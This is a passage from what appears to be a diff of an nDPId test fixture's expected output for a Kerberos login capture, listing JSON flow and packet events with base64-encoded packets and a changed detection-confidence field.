FEVXb48WriKsXF9DT855WrPQJaunamvGrHPBNTvW5O7J1GsSxunQtlIcRHa8BJwjCw="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716140238,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02081{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946716140238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1253,"pkt_l4_len":1219,"thread_ts_msec":946716140238,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATXAgcAAIAREQcKAQwCCgUDAQRCAFgEw7vvbIIEtzCCBLOhAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivWiNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQG
PjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9zEhzGUIWSO2nSAJqmDXobCtcu76K3Rboc\/fF9nnyrTYYtLKR3UTvhOtz+lYZjy30fUznqQuQn9FtrPxZZ9KcR0aeNGj5jFqT78wE7zx10zQdQcEYtMt1Yyoq5p6Q6IsiC81GplCnPyxSQCLZJft+l9Mq1iY\/qnQqSFUZfs6kcDBuoAcDBQBggQAQogwbCkRFTllEQy5DT02jHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02lERgPMjAzNzA5MTMwMjQ4MDVapwYCBDItBdKoGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716140238,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
+00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716140238,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02047{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946716140238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1224,"pkt_l4_len":1190,"thread_ts_msec":946716140238,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS6Sr0AAIARyG0KBQMBCgEMAgBYBEIEpt71bYIEmjCCBJagAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHdSoYQyi7ff\/cLPWA1HT+38woyNxG7hjyMpFtXNLQ4wwUz2yewJimU\/Syk2Fa\/0Q0E30eV+3qyAUEhdeJ\/mye00Eyjo+t40Omp\/eXw+IGe1ZH6T3PCObVIrhSnpUacK6ii1uuZDD4Rq6I9stqvUPtmYTEfZUghBmSFhKyOF+739jQdMDabCHs42xPF+PE5Khsu\/OuvtkgUlzbOCByNBFPWHM4hq6sxXhGONa32EZ+SoEWcYTpIQzuxousEbeggvFhXEFbIuNBRSFawl6rMWB\/KmaHWXADw8CIbzrEUZstkGSXGF7n2oi7RRxejsRN3c+PeBn7RstHhe0G4eqTB145eevcw23SPSV9euCIwUUxgmQBaJh1SsKM0OGGQYMXd\/X7MRc8Y\/+gAvmDlutKsJJrggZn5cpwu45A1lrsy0RDxzGhWYagdXKP1sdeQyJfZWUj1gaEslI5oAFEndnk8W63AmhpamCf4lKqcUP+3qos7qYekTM2HMg66kqdfdrMwpYncoImN0CBL6cf9PXC\/VC3wKog6Enhmtdig4Q\/rhcleriiYPvB7UzvNKcc32iM3LVFgzhWXwSpxAv4IrTiFRsFL1wKc6eRDWLpbvHSbWELp\/GrXwVikqB0o\/5j+6qBC97
w4GyZ8Gu3Fag8PjsReYLk0WL10vGr5Qc4qa7YDMFuS88Hc60sAKfz31rTmI2ndYvD3PWmpyPEqlCdIPgoAa3Kd11qVxwS55WzDEO8k9YZakvP9KiaUbMKHDvw+8GUIpfvAkDNrY3c6GYUCaiQsNuGTGeYW+NrXxWSBG5j2cKtkEW2pMj0v7\/fnPv0o1pLgJl0UzPMq6kLhkoQGC1aC+ANDcZVNQtaYf0juArE6KS6eYgwagrgjn8DbbKE1UxbEnj71zd9MIV2lntPE\/5wNBElNY0OZzjY0k1z+JKn3UlF4k9y\/GwCRua+fbhv3WS6ctnSQrOVVwIJwSSmH9VennduWMRg4\/CLrPyn8iDivCSUXVruZ\/RjO5NoO7Ay+xWX92CZfzP28uqP6g5yOIXxfQF7aEMzvuGnyXGrpGyaj\/HpoHzMIHwoAMCAReigegEgeVL5D9X6hJ97pJp43APBNgTkCTDlRzjmWMnYtfTH2AvHn1h0R2mI58TZnhtl8lC\/7egmLy0XdjJQvyIr0QhH6s9cdKZ+gNDfFgr1ctf5lul4+BKJ7CiDdQRgxJInO6QVh3EuJ5GOm+2RyNu\/ZC2\/D1obkALe8L6KOE0kVvmWG0sBF+cnBegsz7LabfCyqSPSndOogCpJB0w4UneS3xQPcxCdEoirYn9r4tdlA5\/XqbJGs\/Gmbb8y2acBEtu04q1XpFvWuu\/xevycdkVI4OnavQShSYhrsei9lpAin7IICceujNouKy+"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1235,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1235,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946716140476,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946716140476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1277,"pkt_l4_len":1243,"thread_ts_msec":946716140476,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATvAhgAAIAREN4KAQwCCgUDAQREAFgE2zRybIIEzzCCBMuhAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivWiNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQGPjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9yfyxOO1tDXfkA21swax5sbcMOPHtz7FOWAJjttySYh9q\/U6+DaiPCkQdJZimVz4\/paJ2BxXfqBHjHe9cI0tG8FS08MzW1ar6H9PqA6Jjo6qK8PWdlaX14V6ahvbqdGHCzINrk4h0zH1k1RbjMVXvPB54LZXwfThm6YvXS8KkgYcwgYSgBwMFAECAAACiDBsKREVOWURDLkNPTaM1MDOgAwIBAqEsMCobBGxkYXAbFnZwYy1
3MmszZW50LmRlbnlEQy5jb20bCmRlbnlEQy5jb22lERgPMjAzNzA5MTMwMjQ4MDVapwYCBDXdepyoGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1235,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1235,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946716140476,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1235,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1235,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946716140476,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
02109{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946716140476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1270,"pkt_l4_len":1236,"thread_ts_msec":946716140476,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAToStAAAIARyCwKBQMBCgEMAgBYBEQE1LNjbYIEyDCCBMSgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA4lhggOFMIIDgaADAgEFoQwbCkRFTllEQy5DT02iNTAzoAMCAQKhLDAqGwRsZGFwGxZ2cGMtdzJrM2VudC5kZW55REMuY29tGwpkZW55REMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx1XI1556E9z8BiUgjJbUldMqjiyjAOxJ74uvYMLDwxmOkONdxBzTP1MSutRBBJQTWWXJYnyPMWu\/zI3K8hgoj0GmO\/W8w5vOr10lKcN1HyFNXzfCcmd+XgtMHJyD9BpjeNQ1qJ7oPMb+3WHTRYAFu8twMOmamcEqk6jWl+RywUCXjB9QNUKbwcPH\/JoF+zgvjfdfQ2OGDZa6PRJfaZGOL3Bz+FIbH9C2Fx\/I0nE4oaZcxNFRtxYJUyvG9vShCS\/R5MP0kJ2mnUJANBpE\/Vhz++ZSyLN6pNHd\/BEJAUsjGylkuTxzl2Lnq6PkkBTlHz+pgv6hR\/FyMk7kXPcVY6PpFUDiTSVJNw7s++K9VnOE6XjGs8CiEERYB+LMPU0ncEA55LXWZNmAVu1KOAGMj17PTgVLoL6gcSspNormMp\/nfk9k7yWeMj9WVgNKNXSes\/iL2g6dE8UXWlxn0w0DA41fhjG98Ub5akpglBCfge1kIIGd7awaZFdsAGhJH2reytyG4e4AahbQRH8St4p8iuP5pTlvGPcTIF90Lk1zalSH6f+3t2i+KQ3rrJRWlqIFMxL0W6xWXWN2A69OpkDW7SJZqdqxhUDrJHBEZqo7\/kr1rPXjk3tEZUZ+\/3jYgOnA6KoV+FvCed0t8bykcaXzgJB3JixzvMvrL0YUkrgDYHyGlolZi0zI2+6D6YaI9ANLUPJhNyzYBA93Yfsl3o6ZSj0mmgiZq\/lVbEpMl51Vc+fIXypt8EHCM6glksV3GB+sT+9kvU5YmZf4p35ih5qs+B6wxDScYCHnxUQ5M7Y+CaB+Z8umyuJFuExqyhaLvsHxSu7C5RR9zkRoXRxlMlSUlioW\/k\/f2t8OixHzUGA4Pjlkvsn7oU9bY5CEFkvEOMd9OAWhdmwZX2trUJgB9kuTMLfC08vIm25jVGyjrOMvrfllYb9Tkon9cDFzySBqwpdy3mzAFDGbSbgSSVph9mJQQwd5HbHKinSVH6cIBJewcN67UlHl60gcsB648MqUc5y3yNg\/aT2LJRlx4Hugf4703fBz1ilFKkTyia5hLwY0ditm6aCAQowggEGoAMCAReigf4Egfs6rVBU5Wbf58UJI1nlKrW\/LPMlXp44cwupSkh1AXVr0jMWvkg\/cKqEOLVh+eLdXMJf\/7tuabmMyWEcrpHyGjV8QdU\/LRfiYvKiLliUQZc2ab4RQLJpbpbJm162ZbTsK8MoJ0nxxcKChBmo7b0Cn4N95XSQaG\/mILea4u+9\/df1RJfKa1Rm6tTGG5JYZqb2yXuujbwC30Zt17c1Hi\/vUkA9vpV1e6xV2EIpz
TM7qHDcAeZWNHGOA4MUdtxQCXzJDDEFf9vqk1T481Q3FdEgo63vG0rmeUX8x9LMl7OmGOelI0Hkx4m0lCbreYKTnpzNK53E2WNaqEIapwkuaQ=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02090{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946716140774,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1263,"pkt_l4_len":1229,"thread_ts_msec":946716140774,"pkt":"AAP\/pqsMAAP\/p6sMCABFAAThAjoAAIAREMoKAQwCCgUDAQRIAFgEzRTGbIIEwTCCBL2hAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivW
iNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQGPjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9EeZm1xXCGjpTcLGRq4WuQ8ssviUxl213ypmulixTQWFmAQi1gq8M3vB7vTp7SGKt8sIF14iqGTiJJWz+TgAufWTJ4n2ibf9kuYyLGTZfXqU+XTn7oSwP6CplUyx8Rcx6fjORhXuzJFTp0WjwfJC+Z3aW5oAvEH9BL5cNtHmkejB4oAcDBQBAgAAAogwbCkRFTllEQy5DT02jKTAnoAMCAQKhIDAeGwRjaWZzGxZ2cGMtdzJrM2VudC5kZW55ZGMuY29tpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQ1jymRqBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
+00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946716140774,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1244,"pkt_l4_len":1210,"thread_ts_msec":946716140774,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATOSu8AAIARyCcKBQMBCgEMAgBYBEgEurmkbYIErjCCBKqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iKTAnoAMCAQKhIDAeGwRjaWZzGxZ2cGMtdzJrM2VudC5kZW55ZGMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx0aFmxok9g1Ue0357Hr75qdhqZfRht4OHreKB5u\/V5IirkcwENplNxxQmbw8+DFBp6kUxON4ouXLUpsGQja+UwQNswQ7cEXb3TTT7jYMm2q+XU9A8z+Cm+x45x6EPfupXNfUoIz5d+DBXqnAKwiMsohJZBYGmEm7Q+yhVWVar9k\/vQ4EHxPSmoKKOWOqMeWxjcfGizeQcfY\/7A7oBkliScCXMBosF3zWgVn6SZUxx2nLdkS4jVlNmS1jWY0CBy3hQgCl7KtJ88Rxj2JXMQ5Fa0ibQHlt+FeHBgOikUOCt7JR9KHGnKF+V9OwmxFHJrtiKrEW2Cv72q08\/TX55bwUm9jrgvLF+1YsovMtrgWOHLFsVcxNfbdawsk1MAGXI1K8WdNlNxj79Sa+effGMmTt32eF8\/oOYgeR3A+0F1wnFjIQeheNTRLl\/9WBWymTf5CVGZk9I\/sUh0ufZ1o58VaghVEb+aOBC6tWfpsOkLJ9ANhxY1Vw45ioZzS06CBZRvW7MMUcb4Ur7IeznoOXOKL+obkIkaEuJF9dxjVVEK3H8T8BFen6GrrRV4+9gxQ28wWj2B\/3R0I0K8npdyxugyU7o6q1h547H+5tjJ8dixUeIFR0R+BxQUA1qGlV
kB7SS4zvQUHJeQ33GsZmfB09OjxsbZUKDOYPS2DppWChX3zAiJESMybgCQW5ulCO\/DCKGrcKFEaqcfqvdr1e4WyRdwCcvZn2MJR1nu01uw1EbqNmvBlDTHXDpZmQAS+Z9AFAEe6+Jwucjc+X3W9+cKSxj+uTpUbPMfAp3MPTCh88MxPw2Aax6SFtx5IK+P6jE2F6eQfjhX9aV6hdIZ0pWVxFUqJk1oXwgJHigW8nhTnJsDeLgqs70DVvtJOOt9wQIyuysdS5eh4ZJK2TyKfSg9XuEekXtqV8HHagG6OZO87HJsGQmu\/\/tjHaE7Ql4hIoe+fcxYBzuwcDJYmBr6xlBxFqKXZZHTBFk60GqPFITFaX17Oz+6fJYP3RmN2JGKt17gwAhua9IJr3+oyzOLK9Ar9ryp7P5t03iErc\/1gvMC+WI+39aaB\/TCB+qADAgEXooHyBIHv9+WbNZuFKxvCR6wr2zaCGnigV6GBLntoGkqEg4\/vMLz6p+qzEJQC2ilW82BTzXU6scdi61TaIC3oq6sMVee5Q+SNihDQg2j\/e7P09S+lWbe2hxhDb2MYsqe8Lg50XMclkXvYxZYVxgGfh9+QhSOku3gyZ4w550hPMwNPtwT50N8oSP0YzMlcdyjS0yGxX38Sztfi6maarSaN8R8bO1fNlv7DMT0XFldAA9Ujo2zbz4RI5ls2TDkFYA60ukMDSLX5c+pTDKFVkARApYRvSaMnKg1aCCWfstO5zat+wIz45gQKBeA3dPJACT5hwG+Q1qc="} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":29024,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":12,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":946724453221} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
